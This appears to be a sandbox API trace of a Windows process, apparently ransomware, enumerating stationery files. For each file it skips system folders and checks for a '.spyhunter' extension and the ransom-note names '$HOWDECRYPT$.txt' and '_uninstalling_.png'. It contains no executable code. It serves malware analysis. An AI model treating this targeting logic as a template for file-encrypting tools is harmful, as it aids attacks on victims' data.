lstrcmpW (lpString1="Hand Prints.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.769] lstrcmpW (lpString1="Hand Prints.htm", lpString2="_uninstalling_.png") returned 1 [0089.769] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 77 [0089.769] GetProcessHeap () returned 0x2c0000 [0089.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3736f0 [0089.769] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdd0) returned 0x3824f8 [0089.770] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.770] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0089.770] lstrlenW (lpString="Windows") returned 7 [0089.770] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="$Recycle.bin") returned 1 [0089.770] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.770] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="System Volume Information") returned -1 [0089.770] lstrlenW (lpString="System Volume Information") returned 25 [0089.770] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 76 [0089.770] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".spyhunter") returned 0x0 [0089.770] lstrcmpW (lpString1="HandPrints.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.770] lstrcmpW (lpString1="HandPrints.jpg", lpString2="_uninstalling_.png") returned 1 [0089.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 76 [0089.770] GetProcessHeap () returned 0x2c0000 [0089.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372870 [0089.770] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdd8) returned 0x3824f8 [0089.770] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.770] lstrcmpiW (lpString1="Memo.emf", lpString2="Windows") returned -1 [0089.770] lstrlenW (lpString="Windows") returned 7 [0089.770] lstrcmpiW (lpString1="Memo.emf", lpString2="$Recycle.bin") returned 1 [0089.770] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.770] lstrcmpiW (lpString1="Memo.emf", lpString2="System Volume Information") returned -1 [0089.770] lstrlenW (lpString="System Volume Information") returned 25 [0089.770] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 70 [0089.770] StrStrIW (lpFirst="Memo.emf", lpSrch=".spyhunter") returned 0x0 [0089.770] lstrcmpW (lpString1="Memo.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.770] lstrcmpW (lpString1="Memo.emf", lpString2="_uninstalling_.png") returned 1 [0089.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 70 [0089.771] GetProcessHeap () returned 0x2c0000 [0089.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37d7e0 [0089.771] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xde0) returned 0x3824f8 [0089.771] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.771] lstrcmpiW (lpString1="Monet.jpg", lpString2="Windows") returned -1 [0089.771] lstrlenW (lpString="Windows") returned 7 [0089.771] lstrcmpiW (lpString1="Monet.jpg", lpString2="$Recycle.bin") returned 1 [0089.771] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.771] lstrcmpiW (lpString1="Monet.jpg", lpString2="System Volume Information") returned -1 [0089.771] lstrlenW (lpString="System Volume Information") returned 25 [0089.771] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 71 [0089.771] StrStrIW (lpFirst="Monet.jpg", lpSrch=".spyhunter") returned 0x0 [0089.771] lstrcmpW (lpString1="Monet.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.771] lstrcmpW (lpString1="Monet.jpg", lpString2="_uninstalling_.png") returned 1 [0089.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 71 [0089.771] GetProcessHeap () returned 0x2c0000 [0089.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d630 [0089.771] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xde8) returned 0x3824f8 [0089.771] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.771] lstrcmpiW (lpString1="Month_Calendar.emf", lpString2="Windows") returned -1 [0089.771] lstrlenW (lpString="Windows") returned 7 [0089.771] lstrcmpiW (lpString1="Month_Calendar.emf", lpString2="$Recycle.bin") returned 1 [0089.771] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.771] lstrcmpiW (lpString1="Month_Calendar.emf", lpString2="System Volume Information") returned -1 [0089.771] lstrlenW (lpString="System Volume Information") returned 25 [0089.771] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 80 [0089.772] StrStrIW (lpFirst="Month_Calendar.emf", lpSrch=".spyhunter") returned 0x0 [0089.772] lstrcmpW (lpString1="Month_Calendar.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.772] lstrcmpW (lpString1="Month_Calendar.emf", lpString2="_uninstalling_.png") returned 1 [0089.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 80 [0089.772] GetProcessHeap () returned 0x2c0000 [0089.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329818 [0089.772] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdf0) returned 0x3824f8 [0089.772] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.772] lstrcmpiW (lpString1="Music.emf", lpString2="Windows") returned -1 [0089.772] lstrlenW (lpString="Windows") returned 7 [0089.772] lstrcmpiW (lpString1="Music.emf", lpString2="$Recycle.bin") returned 1 [0089.772] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.772] lstrcmpiW (lpString1="Music.emf", lpString2="System Volume Information") returned -1 [0089.772] lstrlenW (lpString="System Volume Information") returned 25 [0089.772] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 71 [0089.772] StrStrIW (lpFirst="Music.emf", lpSrch=".spyhunter") returned 0x0 [0089.772] lstrcmpW (lpString1="Music.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.772] lstrcmpW (lpString1="Music.emf", lpString2="_uninstalling_.png") returned 1 [0089.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 71 [0089.772] GetProcessHeap () returned 0x2c0000 [0089.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37da68 [0089.772] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdf8) returned 0x3824f8 [0089.772] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.772] lstrcmpiW (lpString1="Notebook.jpg", lpString2="Windows") returned -1 [0089.772] lstrlenW (lpString="Windows") returned 7 [0089.773] lstrcmpiW (lpString1="Notebook.jpg", lpString2="$Recycle.bin") returned 1 [0089.773] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.773] lstrcmpiW (lpString1="Notebook.jpg", lpString2="System Volume Information") returned -1 [0089.773] lstrlenW (lpString="System Volume Information") returned 25 [0089.773] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 74 [0089.773] StrStrIW (lpFirst="Notebook.jpg", lpSrch=".spyhunter") returned 0x0 [0089.773] lstrcmpW (lpString1="Notebook.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.773] lstrcmpW (lpString1="Notebook.jpg", lpString2="_uninstalling_.png") returned 1 [0089.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 74 [0089.773] GetProcessHeap () returned 0x2c0000 [0089.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x385d00 [0089.773] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe00) returned 0x3824f8 [0089.773] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.773] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0089.773] lstrlenW (lpString="Windows") returned 7 [0089.773] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="$Recycle.bin") returned 1 [0089.773] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.773] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="System Volume Information") returned -1 [0089.773] lstrlenW (lpString="System Volume Information") returned 25 [0089.773] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 80 [0089.773] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".spyhunter") returned 0x0 [0089.773] lstrcmpW (lpString1="Orange Circles.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.773] lstrcmpW (lpString1="Orange Circles.htm", lpString2="_uninstalling_.png") returned 1 [0089.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 80 [0089.773] GetProcessHeap () returned 0x2c0000 [0089.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329908 [0089.773] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe08) returned 0x3824f8 [0089.774] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.774] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0089.774] lstrlenW (lpString="Windows") returned 7 [0089.774] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="$Recycle.bin") returned 1 [0089.774] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.774] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="System Volume Information") returned -1 [0089.774] lstrlenW (lpString="System Volume Information") returned 25 [0089.774] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 79 [0089.774] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".spyhunter") returned 0x0 [0089.774] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.774] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="_uninstalling_.png") returned 1 [0089.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 79 [0089.774] GetProcessHeap () returned 0x2c0000 [0089.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3743e8 [0089.774] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe10) returned 0x3824f8 [0089.774] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.774] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0089.774] lstrlenW (lpString="Windows") returned 7 [0089.774] lstrcmpiW (lpString1="Peacock.htm", lpString2="$Recycle.bin") returned 1 [0089.774] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.774] lstrcmpiW (lpString1="Peacock.htm", lpString2="System Volume Information") returned -1 [0089.774] lstrlenW (lpString="System Volume Information") returned 25 [0089.774] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned 73 [0089.774] StrStrIW (lpFirst="Peacock.htm", lpSrch=".spyhunter") returned 0x0 [0089.774] lstrcmpW (lpString1="Peacock.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.774] lstrcmpW (lpString1="Peacock.htm", lpString2="_uninstalling_.png") returned 1 [0089.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned 73 [0089.775] GetProcessHeap () returned 0x2c0000 [0089.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x385de0 [0089.775] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe18) returned 0x3824f8 [0089.775] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.775] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0089.775] lstrlenW (lpString="Windows") returned 7 [0089.775] lstrcmpiW (lpString1="Peacock.jpg", lpString2="$Recycle.bin") returned 1 [0089.775] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.775] lstrcmpiW (lpString1="Peacock.jpg", lpString2="System Volume Information") returned -1 [0089.775] lstrlenW (lpString="System Volume Information") returned 25 [0089.789] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 73 [0089.789] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".spyhunter") returned 0x0 [0089.789] lstrcmpW (lpString1="Peacock.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.789] lstrcmpW (lpString1="Peacock.jpg", lpString2="_uninstalling_.png") returned 1 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 73 [0089.789] GetProcessHeap () returned 0x2c0000 [0089.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x385ec0 [0089.789] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe18) returned 0x3824f8 [0089.789] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.789] lstrcmpiW (lpString1="Pine_Lumber.jpg", lpString2="Windows") returned -1 [0089.789] lstrlenW (lpString="Windows") returned 7 [0089.789] lstrcmpiW (lpString1="Pine_Lumber.jpg", lpString2="$Recycle.bin") returned 1 [0089.789] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.789] lstrcmpiW (lpString1="Pine_Lumber.jpg", lpString2="System Volume Information") returned -1 [0089.789] lstrlenW (lpString="System Volume Information") returned 25 [0089.789] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 77 [0089.789] StrStrIW (lpFirst="Pine_Lumber.jpg", lpSrch=".spyhunter") returned 0x0 [0089.789] lstrcmpW (lpString1="Pine_Lumber.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.789] lstrcmpW (lpString1="Pine_Lumber.jpg", lpString2="_uninstalling_.png") returned 1 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 77 [0089.790] GetProcessHeap () returned 0x2c0000 [0089.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373820 [0089.790] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe20) returned 0x3824f8 [0089.790] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.790] lstrcmpiW (lpString1="Pretty_Peacock.jpg", lpString2="Windows") returned -1 [0089.790] lstrlenW (lpString="Windows") returned 7 [0089.790] lstrcmpiW (lpString1="Pretty_Peacock.jpg", lpString2="$Recycle.bin") returned 1 [0089.790] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.790] lstrcmpiW (lpString1="Pretty_Peacock.jpg", lpString2="System Volume Information") returned -1 [0089.790] lstrlenW (lpString="System Volume Information") returned 25 [0089.790] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 80 [0089.790] StrStrIW (lpFirst="Pretty_Peacock.jpg", lpSrch=".spyhunter") returned 0x0 [0089.790] lstrcmpW (lpString1="Pretty_Peacock.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.790] lstrcmpW (lpString1="Pretty_Peacock.jpg", lpString2="_uninstalling_.png") returned 1 [0089.790] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 80 [0089.790] GetProcessHeap () returned 0x2c0000 [0089.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3299f8 [0089.790] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe28) returned 0x3824f8 [0089.790] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.790] lstrcmpiW (lpString1="Psychedelic.jpg", lpString2="Windows") returned -1 [0089.790] lstrlenW (lpString="Windows") returned 7 [0089.790] lstrcmpiW (lpString1="Psychedelic.jpg", lpString2="$Recycle.bin") returned 1 [0089.791] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.791] lstrcmpiW (lpString1="Psychedelic.jpg", lpString2="System Volume Information") returned -1 [0089.791] lstrlenW (lpString="System Volume Information") returned 25 [0089.791] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 77 [0089.791] StrStrIW (lpFirst="Psychedelic.jpg", lpSrch=".spyhunter") returned 0x0 [0089.791] lstrcmpW (lpString1="Psychedelic.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.791] lstrcmpW (lpString1="Psychedelic.jpg", lpString2="_uninstalling_.png") returned 1 [0089.791] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 77 [0089.791] GetProcessHeap () returned 0x2c0000 [0089.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373908 [0089.791] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe30) returned 0x3824f8 [0089.791] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.791] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0089.791] lstrlenW (lpString="Windows") returned 7 [0089.791] lstrcmpiW (lpString1="Roses.htm", lpString2="$Recycle.bin") returned 1 [0089.791] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.791] lstrcmpiW (lpString1="Roses.htm", lpString2="System Volume Information") returned -1 [0089.791] lstrlenW (lpString="System Volume Information") returned 25 [0089.791] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 71 [0089.791] StrStrIW (lpFirst="Roses.htm", lpSrch=".spyhunter") returned 0x0 [0089.791] lstrcmpW (lpString1="Roses.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.791] lstrcmpW (lpString1="Roses.htm", lpString2="_uninstalling_.png") returned 1 [0089.792] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 71 [0089.792] GetProcessHeap () returned 0x2c0000 [0089.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d990 [0089.792] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe38) returned 0x3824f8 [0089.792] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.792] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0089.792] lstrlenW (lpString="Windows") returned 7 [0089.792] lstrcmpiW (lpString1="Roses.jpg", lpString2="$Recycle.bin") returned 1 [0089.792] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.792] lstrcmpiW (lpString1="Roses.jpg", lpString2="System Volume Information") returned -1 [0089.792] lstrlenW (lpString="System Volume Information") returned 25 [0089.792] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 71 [0089.792] StrStrIW (lpFirst="Roses.jpg", lpSrch=".spyhunter") returned 0x0 [0089.792] lstrcmpW (lpString1="Roses.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.792] lstrcmpW (lpString1="Roses.jpg", lpString2="_uninstalling_.png") returned 1 [0089.792] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 71 [0089.792] GetProcessHeap () returned 0x2c0000 [0089.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37db40 [0089.792] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe40) returned 0x3824f8 [0089.792] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.792] lstrcmpiW (lpString1="Sand_Paper.jpg", lpString2="Windows") returned -1 [0089.792] lstrlenW (lpString="Windows") returned 7 [0089.792] lstrcmpiW (lpString1="Sand_Paper.jpg", lpString2="$Recycle.bin") returned 1 [0089.792] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.792] lstrcmpiW (lpString1="Sand_Paper.jpg", lpString2="System Volume Information") returned -1 [0089.793] lstrlenW (lpString="System Volume Information") returned 25 [0089.793] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 76 [0089.793] StrStrIW (lpFirst="Sand_Paper.jpg", lpSrch=".spyhunter") returned 0x0 [0089.793] lstrcmpW (lpString1="Sand_Paper.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.793] lstrcmpW (lpString1="Sand_Paper.jpg", lpString2="_uninstalling_.png") returned 1 [0089.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 76 [0089.793] GetProcessHeap () returned 0x2c0000 [0089.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3739f0 [0089.793] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe48) returned 0x3824f8 [0089.793] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.793] lstrcmpiW (lpString1="Seyes.emf", lpString2="Windows") returned -1 [0089.793] lstrlenW (lpString="Windows") returned 7 [0089.793] lstrcmpiW (lpString1="Seyes.emf", lpString2="$Recycle.bin") returned 1 [0089.793] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.793] lstrcmpiW (lpString1="Seyes.emf", lpString2="System Volume Information") returned -1 [0089.793] lstrlenW (lpString="System Volume Information") returned 25 [0089.793] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 71 [0089.794] StrStrIW (lpFirst="Seyes.emf", lpSrch=".spyhunter") returned 0x0 [0089.794] lstrcmpW (lpString1="Seyes.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.794] lstrcmpW (lpString1="Seyes.emf", lpString2="_uninstalling_.png") returned 1 [0089.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 71 [0089.795] GetProcessHeap () returned 0x2c0000 [0089.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37dc18 [0089.795] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe48) returned 0x3824f8 [0089.795] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.795] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0089.795] lstrlenW (lpString="Windows") returned 7 [0089.795] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="$Recycle.bin") returned 1 [0089.795] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.795] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="System Volume Information") returned -1 [0089.795] lstrlenW (lpString="System Volume Information") returned 25 [0089.795] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 80 [0089.795] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".spyhunter") returned 0x0 [0089.795] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.795] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="_uninstalling_.png") returned 1 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 80 [0089.795] GetProcessHeap () returned 0x2c0000 [0089.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329ae8 [0089.795] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe50) returned 0x3824f8 [0089.795] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.795] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0089.795] lstrlenW (lpString="Windows") returned 7 [0089.795] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="$Recycle.bin") returned 1 [0089.795] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.795] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="System Volume Information") returned -1 [0089.795] lstrlenW (lpString="System Volume Information") returned 25 [0089.795] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 78 [0089.796] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".spyhunter") returned 0x0 [0089.796] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.796] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="_uninstalling_.png") returned 1 [0089.796] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 78 [0089.796] GetProcessHeap () returned 0x2c0000 [0089.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x373ad8 [0089.796] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xe58) returned 0x3824f8 [0089.796] 